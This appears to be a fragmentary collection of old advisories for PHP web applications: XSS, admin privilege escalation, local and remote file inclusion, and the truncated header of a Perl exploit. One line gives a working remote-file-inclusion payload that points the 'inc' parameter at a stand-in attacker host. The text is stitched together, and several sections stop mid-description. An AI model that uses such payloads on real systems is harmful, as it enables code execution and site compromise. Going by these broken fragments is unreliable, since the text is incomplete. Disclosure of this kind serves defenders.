:: IwebNegar v1.1 Multiple vulnerabilities ::
Software : IwebNegar v1.1
Website :
Bug Discover : Hessam-x / www.hessamx.net
I. Cross Site Scripting Vulnerability
-
Parameter
DeluxeBB 1.07 Create admin Exploit
+ Summary :
Name : DeluxeBB 1.07
Class : Remote
Risk : High
+ Description:
DeluxeBB (1.07) Have a high Security Bug in
user control panel (cp.php) .
this bug allows to users change access level
~ TinyPHP forum v 3.6
# Local File Inclusion in Profile.php
# Coded By Hessam-x www.hessamx.net
~ Exploit:
http://www.milw0rm.com/exploits/1857
OaBoard version 1.x have remote file inclusion .
Variables $inc isn't initialized in the include()
http://host/oaboard/forum.php?inc=http://evil_script/
Hessam-x (www.hessamx.net)
#!/usr/bin/perl
# HESSAM-X
# FarsiNews 2.5Pro Exploi
# Exploit by Hessam-x (www.hessamx.net)
#Iran Hackerz Security Team
#WebSite: www.hackerz.ir
#
# Summery
# Name: FarsiNews [www.farsinewsteam.com]
# version : 2.5Pro